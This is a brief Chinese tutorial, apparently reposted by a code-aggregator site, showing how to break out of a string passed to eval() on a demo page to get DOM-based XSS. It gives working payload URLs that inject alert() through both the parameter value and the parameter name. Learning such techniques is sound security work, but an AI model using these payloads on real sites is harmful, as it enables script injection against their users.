大哥带的DOM-XSS进阶eval构造XSS

概述0X01源码分析 那么我们可以如何来构造语法呐？？ 已知eval函数可以执行js 最终的输出是eval(this.xss="你提交的参数";) 那我们是不是可以从参数这里构造一个js 比如 this.xss=1";alert(/zhong/);// 那么我们要这样构造 http://www.xss_demo.com/DOM-xss5.php?xss=k";alert(/zhong/);// 当然这

0X01源码分析

那么我们可以如何来构造语法呐？？
已知eval函数可以执行Js

最终的输出是eval(this.xss="你提交的参数";)

那我们是不是可以从参数这里构造一个Js

比如

this.xss=1";alert(/zhong/);//

那么我们要这样构造

http://www.xss_demo.com/DOM-xss5.PHP?xss=k";alert(/zhong/);//

当然这里未对参数名称做验证我们也可以直接在参数名称里面构造

xss

http://www.xss_demo.com/DOM-xss5.PHP?xss;alert(/zhong/);//=123456

 

 

切记 学习之路 少就是多 慢就是快

总结

以上是内存溢出为你收集整理的大哥带的DOM-XSS进阶eval构造XSS全部内容，希望文章能够帮你解决大哥带的DOM-XSS进阶eval构造XSS所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错，欢迎将内存溢出网站推荐给程序员好友。